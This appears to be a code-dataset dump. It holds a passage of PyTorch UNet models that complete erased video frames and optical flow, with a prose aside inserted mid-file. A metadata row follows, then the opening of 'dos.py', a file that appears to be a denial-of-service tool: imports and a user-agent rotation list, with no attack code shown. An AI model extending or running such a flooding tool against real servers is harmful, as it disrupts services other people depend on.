        self.up02 = up(features_root * 4, features_root * 2)
        self.up03 = up(features_root * 2, features_root)
        self.outc0 = outconv(features_root, raw_out_channels)

        self.up11 = up(features_root * 8, features_root * 4)
        self.up12 = up(features_root * 4, features_root * 2)
        self.up13 = up(features_root * 2, features_root)
        self.outc1 = outconv(features_root, raw_out_channels)

        self.up21 = up(features_root * 8, features_root * 4)
        self.up22 = up(features_root * 4, features_root * 2)
        self.up23 = up(features_root * 2, features_root)
        self.outc2 = outconv(features_root, raw_out_channels)

        self.up31 = up(features_root * 8, features_root * 4)
        self.up32 = up(features_root * 4, features_root * 2)
        self.up33 = up(features_root * 2, features_root)
        self.outc3 = outconv(features_root, raw_out_channels)

        self.up41 = up(features_root * 8, features_root * 4)
        self.up42 = up(features_root * 4, features_root * 2)
        self.up43 = up(features_root * 2, features_root)
        self.outc4 = outconv(features_root, raw_out_channels)

        # Optical flow completion.
        if useFlow:
            self.inc_of = inconv(in_channels, features_root)
            self.down_of1 = down(features_root, features_root * 2)
            self.down_of2 = down(features_root * 2, features_root * 4)
            self.down_of3 = down(features_root * 4, features_root * 8)
            self.up_of1 = up(features_root * 8, features_root * 4)
            self.up_of2 = up(features_root * 4, features_root * 2)
            self.up_of3 = up(features_root * 2, features_root)
            self.outc_of = outconv(features_root, of_out_channels)
    def forward(self, x, x_of):
        # Use incomplete inputs to yield complete inputs.
        all_raw_outputs = []
        all_raw_targets = []
        all_of_outputs = []
        all_of_targets = []
        for raw_i in self.rawRange:
            if self.padding:
                incomplete_x = x.clone()
                incomplete_x[:, raw_i * self.raw_channel_num:(raw_i + 1) * self.raw_channel_num, :, :] = 0
            else:
                incomplete_x = torch.cat([x[:, :raw_i * self.raw_channel_num, :, :],
                                          x[:, (raw_i + 1) * self.raw_channel_num:, :, :]], dim=1)
            all_raw_targets.append(x[:, raw_i * self.raw_channel_num:(raw_i + 1) * self.raw_channel_num, :, :])
            # Complete video events (raw pixel).
            if raw_i == 0:
                x1 = self.inc0(incomplete_x)
                x2 = self.down01(x1)
                x3 = self.down02(x2)
                x4 = self.down03(x3)
                raw = self.up01(x4, x3)
                raw = self.up02(raw, x2)
                raw = self.up03(raw, x1)
                raw = self.outc0(raw)
                all_raw_outputs.append(raw)
            elif raw_i == 1:
                x1 = self.inc1(incomplete_x)
                x2 = self.down11(x1)
                x3 = self.down12(x2)
                x4 = self.down13(x3)
                raw = self.up11(x4, x3)
                raw = self.up12(raw, x2)
                raw = self.up13(raw, x1)
                raw = self.outc1(raw)
                all_raw_outputs.append(raw)
            elif raw_i == 2:
                x1 = self.inc2(incomplete_x)
                x2 = self.down21(x1)
                x3 = self.down22(x2)
                x4 = self.down23(x3)
                raw = self.up21(x4, x3)
                raw = self.up22(raw, x2)
                raw = self.up23(raw, x1)
                raw = self.outc2(raw)
                all_raw_outputs.append(raw)
            elif raw_i == 3:
                x1 = self.inc3(incomplete_x)
                x2 = self.down31(x1)
                x3 = self.down32(x2)
                x4 = self.down33(x3)
                raw = self.up31(x4, x3)
                raw = self.up32(raw, x2)
                raw = self.up33(raw, x1)
                raw = self.outc3(raw)
                all_raw_outputs.append(raw)
            elif raw_i == 4:
                x1 = self.inc4(incomplete_x)
                x2 = self.down41(x1)
                x3 = self.down42(x2)
                x4 = self.down43(x3)
                raw = self.up41(x4, x3)
                raw = self.up42(raw, x2)
                raw = self.up43(raw, x1)
                raw = self.outc4(raw)
                all_raw_outputs.append(raw)
            else:
                print('out of range!')
                raise NotImplementedError
            # Complete video events (optical flow).
            of_i = raw_i - self.raw_of_offset
            if self.useFlow and 0 <= of_i < self.tot_of_num:
                ofx1 = self.inc_of(incomplete_x)
                ofx2 = self.down_of1(ofx1)
                ofx3 = self.down_of2(ofx2)
                ofx4 = self.down_of3(ofx3)
                of = self.up_of1(ofx4, ofx3)
                of = self.up_of2(of, ofx2)
                of = self.up_of3(of, ofx1)
                of = self.outc_of(of)
                all_of_outputs.append(of)
                all_of_targets.append(x_of[:, of_i * self.of_channel_num:(of_i + 1) * self.of_channel_num, :, :])

        all_raw_outputs = torch.cat(all_raw_outputs, dim=1)
        all_raw_targets = torch.cat(all_raw_targets, dim=1)
        if len(all_of_outputs) > 0:
            all_of_outputs = torch.cat(all_of_outputs, dim=1)
            all_of_targets = torch.cat(all_of_targets, dim=1)
        return all_of_outputs, all_raw_outputs, all_of_targets, all_raw_targets
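In `forward`, each incomplete event is built either by zeroing the erased frame's channels (`padding=True`) or by dropping them from the channel axis (`padding=False`). The same slice arithmetic on a flat Python list, as a sketch; `erase_frame` is a hypothetical helper mirroring the `raw_channel_num` indexing above, not code from this model:

```python
def erase_frame(planes, frame_idx, c=3, padding=True):
    """Erase frame `frame_idx` from per-channel planes stacked along one axis.

    Frame i occupies planes[i*c:(i+1)*c], matching the raw_channel_num slices.
    """
    start, stop = frame_idx * c, (frame_idx + 1) * c
    if padding:
        # Keep the channel count; fill the erased frame with zeros.
        return planes[:start] + [0] * c + planes[stop:]
    # Drop the erased frame entirely, shrinking the channel count by c.
    return planes[:start] + planes[stop:]
```

For 5 RGB frames (15 planes), erasing frame 1 either zeros planes 3..5 or leaves 12 planes.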
class SelfCompleteNetFull(nn.Module):  # 5raw5of
    def __init__(self, features_root=32, tot_raw_num=5, tot_of_num=5, border_mode='predict',
                 rawRange=None, useFlow=True, padding=True):
        super(SelfCompleteNetFull, self).__init__()
        assert tot_of_num <= tot_raw_num
        if border_mode == 'predict' or border_mode == 'elasticPredict':
            self.raw_center_idx = tot_raw_num - 1
            self.of_center_idx = tot_of_num - 1
        else:
            self.raw_center_idx = (tot_raw_num - 1) // 2
            self.of_center_idx = (tot_of_num - 1) // 2
        if rawRange is None:
            self.rawRange = range(tot_raw_num)
        else:
            if rawRange < 0:
                rawRange += tot_raw_num
            assert rawRange < tot_raw_num
            self.rawRange = range(rawRange, rawRange + 1)
        self.raw_channel_num = 3  # RGB channel number.
        self.of_channel_num = 2  # optical flow channel number.
        self.tot_of_num = tot_of_num
        self.tot_raw_num = tot_raw_num
        self.raw_of_offset = self.raw_center_idx - self.of_center_idx
        self.useFlow = useFlow
        self.padding = padding
        assert self.raw_of_offset >= 0

        if self.padding:
            in_channels = self.raw_channel_num * tot_raw_num
        else:
            in_channels = self.raw_channel_num * (tot_raw_num - 1)
        raw_out_channels = self.raw_channel_num
        of_out_channels = self.of_channel_num

        # Different types of incomplete video events, each corresponding to a separate UNet.
        # Raw pixel completion.
        self.inc0 = inconv(in_channels, features_root)
        self.down01 = down(features_root, features_root * 2)
        self.down02 = down(features_root * 2, features_root * 4)
        self.down03 = down(features_root * 4, features_root * 8)

        self.inc1 = inconv(in_channels, features_root)
        self.down11 = down(features_root, features_root * 2)
        self.down12 = down(features_root * 2, features_root * 4)
        self.down13 = down(features_root * 4, features_root * 8)

        self.inc2 = inconv(in_channels, features_root)
        self.down21 = down(features_root, features_root * 2)
        self.down22 = down(features_root * 2, features_root * 4)
        self.down23 = down(features_root * 4, features_root * 8)

        self.inc3 = inconv(in_channels, features_root)
        self.down31 = down(features_root, features_root * 2)
        self.down32 = down(features_root * 2, features_root * 4)
        self.down33 = down(features_root * 4, features_root * 8)

        self.inc4 = inconv(in_channels, features_root)
        self.down41 = down(features_root, features_root * 2)
        self.down42 = down(features_root * 2, features_root * 4)
        self.down43 = down(features_root * 4, features_root * 8)

        self.up01 = up(features_root * 8, features_root * 4)
        self.up02 = up(features_root * 4, features_root * 2)
        self.up03 = up(features_root * 2, features_root)
        self.outc0 = outconv(features_root, raw_out_channels)

        self.up11 = up(features_root * 8, features_root * 4)
        self.up12 = up(features_root * 4, features_root * 2)
        self.up13 = up(features_root * 2, features_root)
        self.outc1 = outconv(features_root, raw_out_channels)

        self.up21 = up(features_root * 8, features_root * 4)
        self.up22 = up(features_root * 4, features_root * 2)
        self.up23 = up(features_root * 2, features_root)
        self.outc2 = outconv(features_root, raw_out_channels)

        self.up31 = up(features_root * 8, features_root * 4)
        self.up32 = up(features_root * 4, features_root * 2)
        self.up33 = up(features_root * 2, features_root)
        self.outc3 = outconv(features_root, raw_out_channels)

        self.up41 = up(features_root * 8, features_root * 4)
        self.up42 = up(features_root * 4, features_root * 2)
        self.up43 = up(features_root * 2, features_root)
        self.outc4 = outconv(features_root, raw_out_channels)

        # Optical flow completion.
        if useFlow:
            self.inc_of0 = inconv(in_channels, features_root)
            self.down_of01 = down(features_root, features_root * 2)
            self.down_of02 = down(features_root * 2, features_root * 4)
            self.down_of03 = down(features_root * 4, features_root * 8)

            self.inc_of1 = inconv(in_channels, features_root)
            self.down_of11 = down(features_root, features_root * 2)
            self.down_of12 = down(features_root * 2, features_root * 4)
            self.down_of13 = down(features_root * 4, features_root * 8)

            self.inc_of2 = inconv(in_channels, features_root)
            self.down_of21 = down(features_root, features_root * 2)
            self.down_of22 = down(features_root * 2, features_root * 4)
            self.down_of23 = down(features_root * 4, features_root * 8)

            self.inc_of3 = inconv(in_channels, features_root)
            self.down_of31 = down(features_root, features_root * 2)
            self.down_of32 = down(features_root * 2, features_root * 4)
            self.down_of33 = down(features_root * 4, features_root * 8)

            self.inc_of4 = inconv(in_channels, features_root)
            self.down_of41 = down(features_root, features_root * 2)
            self.down_of42 = down(features_root * 2, features_root * 4)
            self.down_of43 = down(features_root * 4, features_root * 8)

            self.up_of01 = up(features_root * 8, features_root * 4)
            self.up_of02 = up(features_root * 4, features_root * 2)
            self.up_of03 = up(features_root * 2, features_root)
            self.outc_of0 = outconv(features_root, of_out_channels)

            self.up_of11 = up(features_root * 8, features_root * 4)
            self.up_of12 = up(features_root * 4, features_root * 2)
            self.up_of13 = up(features_root * 2, features_root)
            self.outc_of1 = outconv(features_root, of_out_channels)

            self.up_of21 = up(features_root * 8, features_root * 4)
            self.up_of22 = up(features_root * 4, features_root * 2)
            self.up_of23 = up(features_root * 2, features_root)
            self.outc_of2 = outconv(features_root, of_out_channels)

            self.up_of31 = up(features_root * 8, features_root * 4)
            self.up_of32 = up(features_root * 4, features_root * 2)
            self.up_of33 = up(features_root * 2, features_root)
            self.outc_of3 = outconv(features_root, of_out_channels)

            self.up_of41 = up(features_root * 8, features_root * 4)
            self.up_of42 = up(features_root * 4, features_root * 2)
            self.up_of43 = up(features_root * 2, features_root)
            self.outc_of4 = outconv(features_root, of_out_channels)
    def forward(self, x, x_of):
        # Use incomplete inputs to yield complete inputs.
        all_raw_outputs = []
        all_raw_targets = []
        all_of_outputs = []
        all_of_targets = []
        for raw_i in self.rawRange:
            if self.padding:
                incomplete_x = x.clone()
                incomplete_x[:, raw_i * self.raw_channel_num:(raw_i + 1) * self.raw_channel_num, :, :] = 0
            else:
                incomplete_x = torch.cat([x[:, :raw_i * self.raw_channel_num, :, :],
                                          x[:, (raw_i + 1) * self.raw_channel_num:, :, :]], dim=1)
            all_raw_targets.append(x[:, raw_i * self.raw_channel_num:(raw_i + 1) * self.raw_channel_num, :, :])
            if raw_i == 0:
                x1 = self.inc0(incomplete_x)
                x2 = self.down01(x1)
                x3 = self.down02(x2)
                x4 = self.down03(x3)
                raw = self.up01(x4, x3)
                raw = self.up02(raw, x2)
                raw = self.up03(raw, x1)
                raw = self.outc0(raw)
                all_raw_outputs.append(raw)
            elif raw_i == 1:
                x1 = self.inc1(incomplete_x)
                x2 = self.down11(x1)
                x3 = self.down12(x2)
                x4 = self.down13(x3)
                raw = self.up11(x4, x3)
                raw = self.up12(raw, x2)
                raw = self.up13(raw, x1)
                raw = self.outc1(raw)
                all_raw_outputs.append(raw)
            elif raw_i == 2:
                x1 = self.inc2(incomplete_x)
                x2 = self.down21(x1)
                x3 = self.down22(x2)
                x4 = self.down23(x3)
                raw = self.up21(x4, x3)
                raw = self.up22(raw, x2)
                raw = self.up23(raw, x1)
                raw = self.outc2(raw)
                all_raw_outputs.append(raw)
            elif raw_i == 3:
                x1 = self.inc3(incomplete_x)
                x2 = self.down31(x1)
                x3 = self.down32(x2)
                x4 = self.down33(x3)
                raw = self.up31(x4, x3)
                raw = self.up32(raw, x2)
                raw = self.up33(raw, x1)
                raw = self.outc3(raw)
                all_raw_outputs.append(raw)
            elif raw_i == 4:
                x1 = self.inc4(incomplete_x)
                x2 = self.down41(x1)
                x3 = self.down42(x2)
                x4 = self.down43(x3)
                raw = self.up41(x4, x3)
                raw = self.up42(raw, x2)
                raw = self.up43(raw, x1)
                raw = self.outc4(raw)
                all_raw_outputs.append(raw)
            else:
                print('out of range!')
                raise NotImplementedError

            of_i = raw_i - self.raw_of_offset
            if self.useFlow and 0 <= of_i < self.tot_of_num:
                if of_i == 0:
                    ofx1 = self.inc_of0(incomplete_x)
                    ofx2 = self.down_of01(ofx1)
                    ofx3 = self.down_of02(ofx2)
                    ofx4 = self.down_of03(ofx3)
                    of = self.up_of01(ofx4, ofx3)
                    of = self.up_of02(of, ofx2)
                    of = self.up_of03(of, ofx1)
                    of = self.outc_of0(of)
                    all_of_outputs.append(of)
                elif of_i == 1:
                    ofx1 = self.inc_of1(incomplete_x)
                    ofx2 = self.down_of11(ofx1)
                    ofx3 = self.down_of12(ofx2)
                    ofx4 = self.down_of13(ofx3)
                    of = self.up_of11(ofx4, ofx3)
                    of = self.up_of12(of, ofx2)
                    of = self.up_of13(of, ofx1)
                    of = self.outc_of1(of)
                    all_of_outputs.append(of)
                elif of_i == 2:
                    ofx1 = self.inc_of2(incomplete_x)
                    ofx2 = self.down_of21(ofx1)
                    ofx3 = self.down_of22(ofx2)
                    ofx4 = self.down_of23(ofx3)
                    of = self.up_of21(ofx4, ofx3)
                    of = self.up_of22(of, ofx2)
                    of = self.up_of23(of, ofx1)
                    of = self.outc_of2(of)
                    all_of_outputs.append(of)
                elif of_i == 3:
                    ofx1 = self.inc_of3(incomplete_x)
                    ofx2 = self.down_of31(ofx1)
                    ofx3 = self.down_of32(ofx2)
                    ofx4 = self.down_of33(ofx3)
                    of = self.up_of31(ofx4, ofx3)
                    of = self.up_of32(of, ofx2)
                    of = self.up_of33(of, ofx1)
                    of = self.outc_of3(of)
                    all_of_outputs.append(of)
                elif of_i == 4:
                    ofx1 = self.inc_of4(incomplete_x)
                    ofx2 = self.down_of41(ofx1)
                    ofx3 = self.down_of42(ofx2)
                    ofx4 = self.down_of43(ofx3)
                    of = self.up_of41(ofx4, ofx3)
                    of = self.up_of42(of, ofx2)
                    of = self.up_of43(of, ofx1)
                    of = self.outc_of4(of)
                    all_of_outputs.append(of)
                else:
                    print('out of optical flow range!')
                    raise NotImplementedError
                all_of_targets.append(x_of[:, of_i * self.of_channel_num:(of_i + 1) * self.of_channel_num, :, :])

        all_raw_outputs = torch.cat(all_raw_outputs, dim=1)
        all_raw_targets = torch.cat(all_raw_targets, dim=1)
        if len(all_of_outputs) > 0:
            all_of_outputs = torch.cat(all_of_outputs, dim=1)
            all_of_targets = torch.cat(all_of_targets, dim=1)
        return all_of_outputs, all_raw_outputs, all_of_targets, all_raw_targets
class SelfCompleteNet1raw1of(nn.Module):  # 1raw1of
    '''
    rawRange: Int, the idx of raw inputs to be predicted
    '''

    def __init__(self, features_root=64, tot_raw_num=5, tot_of_num=1, border_mode='predict',
                 rawRange=None, useFlow=True, padding=True):
        super(SelfCompleteNet1raw1of, self).__init__()
        assert tot_of_num <= tot_raw_num
        if border_mode == 'predict':
            self.raw_center_idx = tot_raw_num - 1
            self.of_center_idx = tot_of_num - 1
        else:
            self.raw_center_idx = (tot_raw_num - 1) // 2
            self.of_center_idx = (tot_of_num - 1) // 2
        if rawRange is None:
            self.rawRange = range(tot_raw_num)
        else:
            if rawRange < 0:
                rawRange += tot_raw_num
            assert rawRange < tot_raw_num
            self.rawRange = range(rawRange, rawRange + 1)
        self.raw_channel_num = 3  # RGB channel number.
        self.of_channel_num = 2  # optical flow channel number.
        self.tot_of_num = tot_of_num
        self.tot_raw_num = tot_raw_num
        self.raw_of_offset = self.raw_center_idx - self.of_center_idx
        self.useFlow = useFlow
        self.padding = padding
        assert self.raw_of_offset >= 0

        if self.padding:
            in_channels = self.raw_channel_num * tot_raw_num
        else:
            in_channels = self.raw_channel_num * (tot_raw_num - 1)
        raw_out_channels = self.raw_channel_num
        of_out_channels = self.of_channel_num

        self.inc = inconv(in_channels, features_root)
        self.down1 = down(features_root, features_root * 2)
        self.down2 = down(features_root * 2, features_root * 4)
        self.down3 = down(features_root * 4, features_root * 8)
        self.up1 = up(features_root * 8, features_root * 4)
        self.up2 = up(features_root * 4, features_root * 2)
        self.up3 = up(features_root * 2, features_root)
        self.outc = outconv(features_root, raw_out_channels)

        if useFlow:
            self.inc_of = inconv(in_channels, features_root)
            self.down_of1 = down(features_root, features_root * 2)
            self.down_of2 = down(features_root * 2, features_root * 4)
            self.down_of3 = down(features_root * 4, features_root * 8)
            self.up_of1 = up(features_root * 8, features_root * 4)
            self.up_of2 = up(features_root * 4, features_root * 2)
            self.up_of3 = up(features_root * 2, features_root)
            self.outc_of = outconv(features_root, of_out_channels)

    def forward(self, x, x_of):
        # use incomplete inputs to yield complete inputs
        if self.padding:
            incomplete_x = x.clone()
            incomplete_x[:, (self.tot_raw_num - 1) * self.raw_channel_num:, :, :] = 0
        else:
            incomplete_x = x[:, :(self.tot_raw_num - 1) * self.raw_channel_num, :, :]
        raw_target = x[:, (self.tot_raw_num - 1) * self.raw_channel_num:, :, :]

        x1 = self.inc(incomplete_x)
        x2 = self.down1(x1)
        x3 = self.down2(x2)
        x4 = self.down3(x3)
        raw = self.up1(x4, x3)
        raw = self.up2(raw, x2)
        raw = self.up3(raw, x1)
        raw_output = self.outc(raw)

        of_output, of_target = None, None  # stay None when optical flow is disabled
        of_i = self.tot_raw_num - 1 - self.raw_of_offset
        if self.useFlow:
            ofx1 = self.inc_of(incomplete_x)
            ofx2 = self.down_of1(ofx1)
            ofx3 = self.down_of2(ofx2)
            ofx4 = self.down_of3(ofx3)
            of = self.up_of1(ofx4, ofx3)
            of = self.up_of2(of, ofx2)
            of = self.up_of3(of, ofx1)
            of_output = self.outc_of(of)
            of_target = x_of[:, of_i * self.of_channel_num:(of_i + 1) * self.of_channel_num, :, :]
        return of_output, raw_output, of_target, raw_target
| 41.135878 | 140 | 0.566731 | 3,575 | 26,944 | 3.993566 | 0.056783 | 0.214331 | 0.06556 | 0.042866 | 0.880787 | 0.85172 | 0.841493 | 0.81999 | 0.768859 | 0.70484 | 0 | 0.053979 | 0.333061 | 26,944 | 654 | 141 | 41.198777 | 0.740512 | 0.028281 | 0 | 0.714286 | 0 | 0 | 0.00444 | 0 | 0 | 0 | 0 | 0 | 0.016917 | 1 | 0.030075 | false | 0 | 0.003759 | 0 | 0.06391 | 0.005639 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
032ea63652b9c6478d6cea77afd77d9cab453845 | 63,494 | py | Python | dos.py | zenux-dev/Blyat-dos | 04b811ff98db8988ca557b87f99ac7bf25c296f8 | [
"MIT"
] | null | null | null | dos.py | zenux-dev/Blyat-dos | 04b811ff98db8988ca557b87f99ac7bf25c296f8 | [
"MIT"
] | null | null | null | dos.py | zenux-dev/Blyat-dos | 04b811ff98db8988ca557b87f99ac7bf25c296f8 | [
"MIT"
] | null | null | null | from queue import Queue
from optparse import OptionParser
import time, sys, socket, threading, logging, urllib.request, random
def user_agent():
    global uagent
    uagent = []
    uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
    uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
    uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
    uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
    uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
    uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
    uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
    uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
    uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
    uagent.append('AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)')
    uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
    uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
    uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)')
    uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E')
    uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
    uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
    uagent.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15')
    uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57')
    uagent.append('Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
    uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
    uagent.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0')
    uagent.append('Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g')
    uagent.append('Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)')
    uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125')
    uagent.append('Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)')
    uagent.append('Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
    uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)')
    uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
    uagent.append('Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)')
    uagent.append('Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)')
    uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)')
    uagent.append('Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10')
    uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4')
    uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0')
    uagent.append('Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10')
    uagent.append('Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)')
    uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)')
    uagent.append('Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)')
    uagent.append('Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/uagent)')
    uagent.append('Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16')
    uagent.append('Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
    uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)')
    uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
    uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)')
    uagent.append('Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)')
    uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7')
uagent.append('BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0')
uagent.append('Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)')
uagent.append('Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10')
